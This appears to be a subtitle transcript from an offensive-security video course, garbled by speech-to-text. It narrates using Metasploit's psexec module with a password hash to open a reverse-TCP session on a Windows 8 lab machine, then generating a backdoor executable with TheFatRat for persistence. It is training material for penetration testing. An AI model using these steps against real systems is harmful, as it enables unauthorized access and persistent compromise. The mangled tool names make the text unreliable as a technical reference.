1
00:00:00,460 --> 00:00:06,340
‫So let's try another method for persistence, which is not deprecated yet.

2
00:00:07,820 --> 00:00:13,940
‫So if you can recall, when we run them interpreters persistance module, it says that the interpreter

3
00:00:13,940 --> 00:00:21,860
‫scripts are deprecated and suggests to us to try the post windows manage persistance XY module.

4
00:00:23,280 --> 00:00:30,030
‫And when we look at the options of the persistance module, we see that we need to have two things.

5
00:00:30,030 --> 00:00:32,770
‫First, we need a session to run a session on.

6
00:00:33,200 --> 00:00:37,890
‫Second, we need to have an executable to use as the backdoor binary.

7
00:00:38,430 --> 00:00:44,250
‫And that means it's our responsibility to find or create a backdoor to use with this module.

8
00:00:45,420 --> 00:00:47,360
‫So let's create a session first.

9
00:00:47,670 --> 00:00:52,350
‫This is the Victor machine, Windows eight, with the IP address to two three.

10
00:00:53,480 --> 00:01:01,070
‫Now, I want to be sure that Windows Defender is up and running, so writing defender in the start menu,

11
00:01:01,400 --> 00:01:07,850
‫here is the Windows defender and yup, it's running and the real time protection is on.

12
00:01:08,960 --> 00:01:14,270
‫So go back to Cauli, open a terminal window and run MSF console.

13
00:01:20,340 --> 00:01:27,390
‫And here I'll use again he exact module to create an interpreter session on the Windows eight victim

14
00:01:27,400 --> 00:01:27,840
‫system.

15
00:01:28,900 --> 00:01:32,950
‫So use exploit Windows SMB Pesek.

16
00:01:33,840 --> 00:01:38,390
‫Set the payload to Windows interpreter reverse TCP.

17
00:01:39,510 --> 00:01:46,020
‫Now is the time to set the options, Colly, as our host, Windows eight as Ellos.

18
00:01:47,550 --> 00:01:48,660
‫Users admin.

19
00:01:49,700 --> 00:01:53,180
‫The password hash was in the file on the desktop.

20
00:01:59,080 --> 00:02:01,750
‫Now we are ready to run the exploit.

21
00:02:03,050 --> 00:02:07,880
‫Yep, look at that, we have an interpreter session on Windows eight, system two to three.

22
00:02:09,410 --> 00:02:12,800
‫So we opened the session and now we need a back door.

23
00:02:14,870 --> 00:02:20,900
‫I'm going to use the fat rat tool to create the malware that sounds like it worked on in.

24
00:02:22,200 --> 00:02:28,920
‫Well, you're right, the fat rat is a powerful and easy to use exploitation tool that can help you

25
00:02:28,920 --> 00:02:34,790
‫to generate back doors and post exploitation attacks like Browsr Tactical Files.

26
00:02:35,430 --> 00:02:41,850
‫This tool compiles malware with popular payloads, and then the compiled malware can be executed on

27
00:02:41,850 --> 00:02:44,550
‫Windows, Linux, Mac, OS, X and Android.

28
00:02:46,420 --> 00:02:52,450
‫Now, since it's not the subject of the course, I'm not going to go in too deep with the fat rat,

29
00:02:53,230 --> 00:02:55,920
‫I'll just quickly use it just to give you an idea.

30
00:02:57,580 --> 00:03:03,640
‫To have detailed information about creating undetectable, malicious software, please, I'll refer

31
00:03:03,640 --> 00:03:07,660
‫you to the social engineering and malware for hacking course.

32
00:03:09,570 --> 00:03:14,700
‫So when we run the fat rat, it first checks if dependent applications are ready.

33
00:03:21,690 --> 00:03:26,760
‫Now, a warning about not to upload the created malware to virus total.

34
00:03:28,170 --> 00:03:34,170
‫Then it starts to PostgreSQL, well, and finally, we're on the main menu of the fat rattrap.

35
00:03:35,440 --> 00:03:39,420
‫I'll type six to use the six option to create a back door.

36
00:03:39,960 --> 00:03:42,270
‫Now we are in the POUN winds menu.

37
00:03:42,750 --> 00:03:44,160
‫Choose the fourth option here.

38
00:03:46,040 --> 00:03:52,190
‫Now is the time to set the options, I'll host it, actually, I'll choose for three to one for the

39
00:03:52,190 --> 00:03:55,040
‫airport and that doesn't have a special meaning.

40
00:03:55,040 --> 00:03:58,190
‫You can choose any port which is not in use at the moment.

41
00:03:59,120 --> 00:04:02,090
‫Choose a base name for the file that will be produced.

42
00:04:02,100 --> 00:04:04,640
‫I'll choose my pretty back door.

43
00:04:06,820 --> 00:04:13,120
‫Now it asks for the payload now and I choose three interpretor rivers' GTP.

44
00:04:15,190 --> 00:04:21,640
‫I start to generate the back door and a few seconds later, back door file is saved to the output folder.

45
00:04:23,820 --> 00:04:29,820
‫Well, I'll open another terminal screen to look at the output folder and go to the output folder under

46
00:04:29,820 --> 00:04:33,000
‫the fat rat using the CD command, of course.

47
00:04:34,960 --> 00:04:39,880
‫And there it is, my pretty back door is right here where I wanted it to be.